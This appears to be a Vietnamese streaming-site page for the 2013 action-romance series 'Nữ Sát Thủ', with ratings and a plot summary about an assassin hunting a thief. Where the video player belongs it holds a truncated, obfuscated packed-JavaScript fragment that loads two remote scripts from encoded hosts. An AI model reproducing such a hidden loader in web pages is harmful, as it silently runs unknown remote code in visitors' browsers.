Banner C1

Phim

Nữ Sát Thủ - Việt Nam

Xem Phim Nữ Sát Thủ - Việt Nam
411571 lượt xem

43/43 Phim Hành ĐộngPhim Tình Cảm Phim Việt Nam

Đạo Diễn: Đang cập nhật

Thời lượng: 43 Tập

Năm phát hành: 2013

Xem phimXem TrailerTải Phim

4.1
215 Star | 53 Rates
  • Các Diễn Viên Trong Phim
  • Nội Dung Phim

Xem Phim Nữ Sát Thủ - Việt Nam trọn bộ: Elly Nguyễn là một nữ sát thủ sở hữu nét đẹp lạnh lùng, thân hình bốc lữa được ông trùm David Hồ đào tạo và nhiệm vụ đầu tiên của cô cũng chính là nhiệm vụ vô cùng khó khăn và ảnh hưởng nhiều đến cuộc đời cô. Đó là về nước truy tìm kẻ bí ẩn đã cướp vali tiền gồm 2 tỷ USD của ông ta. Sở dĩ Elly muốn nhận nhiệm vụ này là vì muốn về nước tìm lại người anh trai bị thất lạc của cô. Xem Phim Nữ Sát Thủ - Việt Nam bắt đầu những tình huống nguy hiểm và éo le khi người bí ẩn đó là Thành Vinh - một tay cướp nổi tiếng và tài bắn súng cả tay.
Nữ Sát Thủ - Việt Nam
Bên cạnh băng nhóm của David Hồ thì Thành Vinh còn bọ bên cảnh sát truy đuổi đứng đầu là Hùng Lâm - anh trai thất lạc của Elly. Xem Phim Nữ Sát Thủ - Việt Nam ngoài những pha truy đuổi gây cấn nghẹt thở thì còn là câu chuyện tình éo le giữa Elly và Thành Vinh khi hai người nảy sinh tình cảm với nhau sau những lần chạm trám để phải chịu những hậu quả nặng nề từ David Hồ.
Nữ Sát Thủ - Việt Nam

Xem phim '\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$.0(\'2://8.3.1/5/6/7/g.9\');$.0(\'2://b.c.1/a/d.e?f=4\')',17,17,'
  • Trailer Phim
8.2
53
  • Phim Cùng Thể Loại

BÌNH LUẬN PHIM : Nữ Sát Thủ - Việt Nam

Banner C1

User Online
Banner C1
Banner C1